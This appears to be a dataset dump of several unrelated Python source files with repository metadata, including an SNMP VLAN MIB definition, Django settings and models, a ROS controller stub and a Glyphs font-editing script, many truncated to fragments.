a3ComVlanIfDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfDescr.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfDescr.setDescription('This is a description of the VLAN interface.')
a3ComVlanIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 3), A3ComVlanType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfType.setDescription('The VLAN interface type.')
a3ComVlanIfGlobalIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setDescription('An administratively assigned global VLAN identifier. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same. The binding between a global identifier and a VLAN interface can be created or removed. To create a binding an NMS must write a non-zero value to this object. To delete a binding, the NMS must write a zero to this object.')
a3ComVlanIfInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 5), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanIfInfo.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfInfo.setDescription('A TLV encoded information string for the VLAN interface. The information contained within this string corresponds to VLAN information not contained within this table, but contained elsewhere within this MIB module. The purpose of this string is to provide an NMS with a quick read mechanism of all related VLAN interface information. The encoding rules are defined according to: tag = 2 bytes length = 2 bytes value = n bytes The following tags are defined: TAG OBJECT DESCRIPTION 1 a3ComIpVlanIpNetAddress IP Network Address of IP VLAN 2 a3ComIpVlanIpNetMask IP Network Mask of IP VLAN')
a3ComVlanIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 6), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the state of the row transitions to active(1), the agent creates the corresponding row in the ifTable.. Setting this object to destroy(6) will remove the corresponding VLAN interface, remove the entry in this table, and the corresponding entries in the a3ComVlanGlobalMappingTable and the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any stacking dependencies in the ifStackTable and any protocol specific tables dependencies.')
a3ComVlanIfModeType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 7), A3ComVlanModeType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfModeType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfModeType.setDescription(' The VLAN mode type for this interface. This object can be set to: usedefault(1) open(2) closed(3) UseDefault Vlans: uses the bridge Vlan Mode value. The bridge Vlan Mode Value can be set to : Open, Closed or Mixed. Open VLANs: have no requirements about relationship between the bridge port that a frame was received upon and the bridge port(s) that it is transmitted on. All open VLANs within the bridge will share the same address table. Closed VLANs: require that the bridge port that a frame is received on is the same VLAN interface as the bridge port(s) that a frame is transmitted on. Each closed VLAN within the bridge will have its own address table.')
a3ComIpVlanTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1), )
if mibBuilder.loadTexts: a3ComIpVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanTable.setDescription('A list of IP VLAN interface information entries. Entries in this table are related to entries in the a3ComVlanIfTable by using the same index.')
a3ComIpVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComIpVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanEntry.setDescription('A a3ComIpVlanEntry contains layer 3 information about a particular IP VLAN interface. Note entries in this table cannot be deleted until the entries in the ifStackTable that produce overlap are removed.')
a3ComIpVlanIpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setDescription('The IP network number for the IP VLAN interface defined in the a3ComVlanIfTable identified with the same index. The IpNetAdress and the IpNetMask must be set and the the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanIpNetMask = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setDescription('The IP network mask corresponding to the IP Network address defined by a3ComIpVlanIpNetAddress. The IpNetAdress and the IpNetMask must be set and the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanStatus.setDescription('The status column for this IP VLAN entry. This object can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the row creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the status changes to active(1), the agent applies the IP parmeters to the IP VLAN interface identified by the corresponding value of the a3ComIpVlanIndex object. Setting this object to destroy(6) will remove the IP parmeters from the IP VLAN interface and remove the entry from this table. Setting this object to destroy(6) will remove the layer 3 information from the IP VLAN interface and will remove the row from this table. Note that this action cannot be performed if there are ifStackTable entries that result in overlapping IP VLAN interfaces. Note that these dependencies must be removed first.')
a3ComVlanProtocolTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2), )
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setDescription('This table lists the configured protocols per Vlan. A single entry exists in this list for each protocol configured on a VLAN interface. The a3ComVlanIfType object in a3ComVlanIfTable has to be set to vlanLayeredProtocols in order to use this table.')
a3ComVlanProtocolEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIfIndex"), (0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIndex"))
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setDescription('A a3ComVlanProtocolEntry contains a single VLAN to protocol entry.')
a3ComVlanProtocolIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setDescription("The first indice of this row and the vlan's ifIndex in the ifTable. The value of this object is the same as the corresponding a3ComVlanIfIndex in the a3ComVlanTable.")
a3ComVlanProtocolIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 2), A3ComVlanLayer3Type())
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setDescription('The second indice of this row, which identifies one of possible many protocols associated with the VLAN interface identified by this entries first indice. The values are based on the layer 3 protocols specified in A3ComVlanType')
a3ComVlanProtocolStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptable to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). Row creation to this table is only possible when a corresponding VLAN entry has been created in the a3ComVlanTable with an a3ComVlanType set to vlanLayeredProtocols(16). Setting this object to destroy(6) will remove the corresponding VLAN interface to protocol mapping.')
a3ComVlanEncapsIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1), )
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setDescription('This table lists VLAN encapsulation interfaces that exist within a device. A single entry exists in this list for each VLAN encapsulation interface in the system. A VLAN encapsulation interface may be created or destroyed.')
a3ComVlanEncapsIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanEncapsIfIndex"))
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setDescription('An individual VLAN encapsulation interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanEncapsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setDescription("The index value of this row and the encapsulation interface's ifIndex in the ifTable. The NMS obtains the index value used for creating a row in this table by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanEncapsIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 2), A3ComVlanEncapsType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setDescription('The encapsulation algorithm used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfTag = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setDescription('The tag used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 4), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setDescription('The row status for this VLAN encapsulation interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notReady(3). In order for a row to become active, the NMS must set a3ComVlanEncapsIfTagType and a3ComVlanEncapsIfTag to some valid and consistent values. Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row, the agent will create the row and change the status to active(1). If any of the necessary objects are not available, or specify an invalid configuration, the row will not be created and the agent will return an appropriate error. Setting this object to createAndWait(5) causes a row in in this table to be created. If all necessary objects in the row have been assigned values and specify a valid configuration, the status of the row will be set to notInService(2); otherwise, the status will be set to notReady(3). This object may only be set to createAndGo(4) or createAndWait(5) if it does not exist. Setting this object to active(1) when the status is notInService(2) causes the agent to commit the row. Setting this object to active(1) when its value is already active(1) is a no-op. Setting this object to destroy(6) will remove the corresponding VLAN encapsulation interface, remote the entry in this table, and remove the corresponding entry in the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any references to this interface in the ifStackTable.')
a3ComNextAvailableVirtIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setDescription("The value of the next available virtual ifIndex. This object is used by an NMS to select an index value for row-creation in tables indexed by ifIndex. The current value of this object is changed to a new value when the current value is written to an agent's table, that is indexed by ifIndex. Row creation using the current value of this object, allocates a virtual ifIndex. Note the following: 1. A newly created row does not have to be active(1) for the agent to allocate the virtual ifIndex. 2. Race conditions between multiple NMS's end when a row is created. Rows are deemed created when a setRequest is successfully committed (i.e. the errorStats is noError(0)). 3. An agent that exhausts its supply of virual ifIndex values returns zero as the value of this object. This can be used by an NMS as an indication to deleted unused rows and reboot the device.")
mibBuilder.exportSymbols("GENERIC-3COM-VLAN-MIB-1-0-7", a3ComVlanEncapsIfStatus=a3ComVlanEncapsIfStatus, a3ComEncapsulationGroup=a3ComEncapsulationGroup, A3ComVlanLayer3Type=A3ComVlanLayer3Type, a3ComVlanIfTable=a3ComVlanIfTable, generic=generic, a3ComIpVlanTable=a3ComIpVlanTable, a3ComVlanIfModeType=a3ComVlanIfModeType, a3ComVlanProtocolTable=a3ComVlanProtocolTable, a3ComVirtualGroup=a3ComVirtualGroup, A3ComVlanType=A3ComVlanType, a3ComIpVlanIpNetMask=a3ComIpVlanIpNetMask, a3ComVlanGlobalMappingTable=a3ComVlanGlobalMappingTable, a3ComVlanEncapsIfIndex=a3ComVlanEncapsIfIndex, a3ComIpVlanIpNetAddress=a3ComIpVlanIpNetAddress, a3ComVlanProtocolIndex=a3ComVlanProtocolIndex, a3ComVlanGlobalMappingEntry=a3ComVlanGlobalMappingEntry, a3ComVlanEncapsIfTag=a3ComVlanEncapsIfTag, a3ComVlanIfIndex=a3ComVlanIfIndex, a3ComNextAvailableVirtIfIndex=a3ComNextAvailableVirtIfIndex, a3ComVlanIfDescr=a3ComVlanIfDescr, a3ComVlanIfStatus=a3ComVlanIfStatus, a3ComVlanGlobalMappingIfIndex=a3ComVlanGlobalMappingIfIndex, a3ComVlanEncapsIfEntry=a3ComVlanEncapsIfEntry, a3ComVlanEncapsIfTable=a3ComVlanEncapsIfTable, a3ComVlanIfGlobalIdentifier=a3ComVlanIfGlobalIdentifier, a3ComVlanIfInfo=a3ComVlanIfInfo, a3ComVlanProtocolIfIndex=a3ComVlanProtocolIfIndex, genVirtual=genVirtual, RowStatus=RowStatus, a3ComIpVlanEntry=a3ComIpVlanEntry, a3ComVlanIfEntry=a3ComVlanIfEntry, a3ComVlanProtocolEntry=a3ComVlanProtocolEntry, A3ComVlanModeType=A3ComVlanModeType, a3ComIpVlanStatus=a3ComIpVlanStatus, a3Com=a3Com, a3ComVlanGroup=a3ComVlanGroup, a3ComVlanEncapsIfType=a3ComVlanEncapsIfType, a3ComVlanProtocolStatus=a3ComVlanProtocolStatus, a3ComVlanIfType=a3ComVlanIfType, a3ComVlanProtocolsGroup=a3ComVlanProtocolsGroup, A3ComVlanEncapsType=A3ComVlanEncapsType, a3ComVlanGlobalMappingIdentifier=a3ComVlanGlobalMappingIdentifier, genExperimental=genExperimental)
| 200.691729 | 1,838 | 0.790536 |
775ee35015e7fb1a1d56468e759eea466f2753f3 | 388 | py | Python | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | 1 | 2020-10-17T04:41:47.000Z | 2020-10-17T04:41:47.000Z | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | from tastypie.authentication import SessionAuthentication | 35.272727 | 86 | 0.693299 |
91f204cefc1e11f78d143865718a0720e6b49302 | 135 | py | Python | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 22 | 2017-07-14T20:01:17.000Z | 2022-03-08T14:22:39.000Z | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 6 | 2017-07-14T21:03:50.000Z | 2021-06-10T19:08:32.000Z | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 13 | 2017-07-14T20:13:14.000Z | 2020-11-12T08:06:05.000Z | from .layer_send import AxolotlSendLayer
from .layer_control import AxolotlControlLayer
from .layer_receive import AxolotlReceivelayer
| 33.75 | 46 | 0.888889 |
91f2badbe46ccc2afa070e8ea0d95aa258e9f159 | 3,199 | py | Python | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
| 42.092105 | 140 | 0.736168 |
91f3e934e2bf21d69c8e84878b0f0bb1bc0e52af | 104 | py | Python | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | from functools import reduce
print(reduce(lambda x, y: x * (y**5), list(map(int, input().split())), 1))
| 34.666667 | 74 | 0.653846 |
91f411263bdba1a973d2748f05c7f918cdbad645 | 1,176 | py | Python | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | 2 | 2019-02-05T02:55:57.000Z | 2019-02-10T20:12:41.000Z | from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
| 25.021277 | 104 | 0.681973 |
91f45538afa3b794621cc7c469da195bbca2956a | 627 | py | Python | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 236 | 2019-05-19T01:48:11.000Z | 2022-03-31T09:03:54.000Z | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 248 | 2019-05-17T19:18:36.000Z | 2022-03-30T21:25:47.000Z | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 85 | 2019-05-17T20:09:27.000Z | 2022-02-28T20:19:00.000Z | import numpy as np
# Golden reference output for the CORDIC sample: 16 rows of expected value
# pairs that the test harness compares against computed results.
# NOTE(review): the meaning of the two columns (e.g. expected vs. computed,
# or per-iteration magnitude pairs) is not evident from this file alone —
# confirm against the cordic sample that consumes this array.
golden = np.array([
    [100.0, 100.0],
    [206.226840616, 179.610387213],
    [1190.25124092, 1197.15702025],
    [1250.76639667, 1250.3933971],
    [1261.76760093, 1250.17718583],
    [1237.4846285, 1237.56490579],
    [1273.56730356, 1266.82141705],
    [1272.899992, 1259.92589118],
    [1.17000308922e-06, 1.21115462165e-06],
    [4.69048419035e-08, 5.61093645301e-08],
    [1.50244060584e-09, 2.44292250731e-09],
    [8.47391624349e-11, 1.15593790738e-10],
    [5.10649970307e-12, 4.80114236959e-12],
    [8.34326950279e-13, 4.1368839091e-13],
    [3.66142109259e-14, 4.95319932219e-14],
    [8.20801944862e-15, 4.94154683061e-14]])
91f4996456aabf6bbe1ac697a26d604a9883879d | 98 | py | Python | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | 2 | 2018-11-14T17:25:24.000Z | 2019-12-09T17:57:30.000Z | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | null | null | null | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | null | null | null | """
User configuration file for the client.
"""
SERVER_ADDRESS = "127.0.0.1"
SERVER_PORT = 50000
| 14 | 39 | 0.704082 |
91f534930f8a5265738ba0e1d6c22b1ba0b55ac6 | 3,479 | py | Python | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | from selenium.common.exceptions import WebDriverException, NoSuchElementException
from Element.Waitor import Waitor
from Element.Find import Find
from Utilitys.WaitUtils import WaitUtils
| 32.514019 | 84 | 0.596148 |
91f55da34b50862c7008aa6fdd44283def33131b | 2,047 | py | Python | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | '''
production setting
'''
# include all base settings
from .base import * # pylint: disable=W0401,W0614
# include credentials (not included in repo)
from . import credentials as crd # pylint: disable=W0401,W0611
# disable debugging
DEBUG = False
# ========================
# SECRET_KEY
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-SECRET_KEY
# ========================
SECRET_KEY = crd.SECRET_KEY
# ========================
# STATIC_ROOT
# Collect static files here
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-STATIC_ROOT
# ========================
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'run', 'static')
# ========================
# Database override
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# ========================
#DATABASES = {
# 'default': {
# }
#}
# ========================
# logging configuration
# https://docs.djangoproject.com/en/1.10/topics/logging/
# ========================
LOGGING = {
    'version': 1,  # dictConfig schema version (always 1)
    # NOTE(review): True silences any loggers configured before this dict is
    # applied — a common Django logging pitfall; confirm this is intentional.
    'disable_existing_loggers': True,
    'formatters': {
        # Detailed format: level, timestamp, module name, message.
        'verbose': {
            'format': '%(levelname)-8s %(asctime)s %(module)-10s %(message)s',
        },
        # Minimal format: level and message only.
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    # No custom filters defined.
    'filters': {
    },
    'handlers': {
        # Console handler is defined but not attached to any logger below.
        'console':{
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'verbose'
        },
        # Rotating log file under <project>/run/: 10 MB per file, 3 backups.
        'file': {
            'level': 'INFO',
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': os.path.join(PROJECT_ROOT, 'run', 'django.log'),
            'maxBytes': 10*1000*1000, # 10M
            'backupCount': 3,
            'formatter': 'verbose',
        },
    },
    'loggers': {
        # Root logger: everything at INFO and above goes to the file handler.
        '': {
            'handlers': ['file'],
            'propagate': True,
            'level': 'INFO',
        },
        # Django's own logs also go to the file handler at INFO.
        'django': {
            'handlers': ['file',],
            'propagate': True,
            'level': 'INFO',
        },
    },
}
| 25.911392 | 78 | 0.484123 |
91f69a518f7a745cba0d44a46ab85227b8ebc8dd | 636 | py | Python | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | from solution import str_range
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
| 18.171429 | 37 | 0.606918 |
91f6f8ff0e9840449fba337706ce6b583a980630 | 8,227 | py | Python | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 8 | 2018-09-14T01:34:01.000Z | 2021-07-01T02:00:23.000Z | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 3 | 2019-09-10T11:39:50.000Z | 2019-10-10T08:26:22.000Z | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 9 | 2018-10-11T15:14:03.000Z | 2021-02-17T11:37:20.000Z | '''
Copyright (C) 2018 Intel Corporation
?
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
?
http://www.apache.org/licenses/LICENSE-2.0
?
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
?
SPDX-License-Identifier: Apache-2.0
'''
import re
import math
import time
from testlib.util.common import g_common_obj
from testlib.graphics.common import window_info
d_metricsreport_impl = DisplayMetricsReportImpl()
| 41.550505 | 115 | 0.629999 |
91f92403a6d2b5956cbf468fe884187f6c555b2a | 3,811 | py | Python | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | #MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| 37.732673 | 140 | 0.724482 |
